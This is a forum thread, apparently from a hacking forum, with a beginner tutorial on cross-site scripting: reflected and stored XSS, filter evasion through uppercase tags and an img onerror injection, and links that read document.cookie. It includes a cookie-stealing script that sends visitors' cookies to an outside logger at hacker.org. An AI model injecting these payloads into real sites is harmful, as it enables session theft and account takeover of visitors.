Introduction to Cross Site Scripting (XSS)
#1
Introduction to Cross Site Scripting (XSS)

Credits: chrudat
Source: Genesis Forums (Tor)

Cross site scripting also known as "XSS" is the ability to execute a client side script on a browser.
It is the result of echoing out user input without proper sanitizing.

A lot of people underestimate this, it can be used in creative CSRF attacks and to steal cookies which could possibly lead to your whole website being compromised.

They're are two mains types of XSS and they are:

Reflected XSS
Stored/persistent XSS


Reflected XSS is something that gets executed with a specially crafted payload which must be inputted each time.
An example of this is: http://vulnerable.website/xss.php?output.../script>

Stored XSS will require you to input your payload once and then it is stored somewhere (normally a database).
Now you can refresh without the payload and it will still be executed - for anyone who visits the page.

Now a days modern browsers have XSS protection - Google Chrome is the fucking king of this.
Firefox has no protection against XSS - or if it does, it's very very bad.

Filter evasion:

Some web application's filtering is inadequate, for example:
$user_input = str_replace("script", "nope");

Now if the user has "script" in his payload it will be replaced with "nope". This is where the evasion comes in.
We can clearly see it isn't case sensitive so <SCRIPT>..</SCRIPT> will be executed.

Commonly, most people have better protection than this. Since we can't see the server code, we need to play trial and error.

I'm not going to list a bunch of code you can try - you should learn Javascript & HTML before using this kind of exploit.

Let's say this web app is preventing xss using htmlentities - that's pretty solid proof.
But they allow <img tags only and they have a height restriction - they think that's fine.

Our payload might look something like this when getting executed:
<img src="$PAYLOAD">

What if we put x.gif" onerror="alert(1)">
That's now going to appear in the HTML as: <img src="x.gif" onerror="alert(1)">"
And since x.gif doesn't exist the inline "onerror" gets executed.

Some websites allow basic tags like <a and inline can be used on this too;
Consider the following:

<a href="javascript:alert(document.cookie);">Click here</a>
<a onclick="alert(document.cookie)">Click here</a>


Cookie stealing:

Consider this:
<script>window.location = "http://hacker.org/logger.php?cookie=" + document.cookie;</script>

I hope I've explained the basics of XSS well enough here.
XSS requires creativity.

Have fun.
Reply
#2
nice article, thanks for sharing if you want to go more in-depth then you will like to see this link https://www.owasp.org/index.php/Cross-si..._%28XSS%29
Reply
#3
(08-02-2015, 08:56 PM)rootaccess Wrote: nice article, thanks for sharing if you want to go more in-depth then you will like to see this link https://www.owasp.org/index.php/Cross-si..._%28XSS%29

Thanks for the link and the input, I always use owasp when I need evasion techniques for filters. They have a very useful xss cheatsheet.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] XSS through Exif headers Insider 1 720 06-16-2020, 11:51 AM
Last Post: LaZr4us
  is my site secure from common hacking? mhiats37 1 2,339 05-11-2019, 03:03 AM
Last Post: misfit
  Guide to XSS (Examples included) NO-OP 3 12,709 04-29-2019, 12:44 PM
Last Post: mhiats37
  [PoC] RunBox.com x MailChimp.com - Stored XSS Vulnerabilities (Bug Bounty Hunting) Daisuke Dan 3 5,923 04-24-2019, 08:47 PM
Last Post: thunder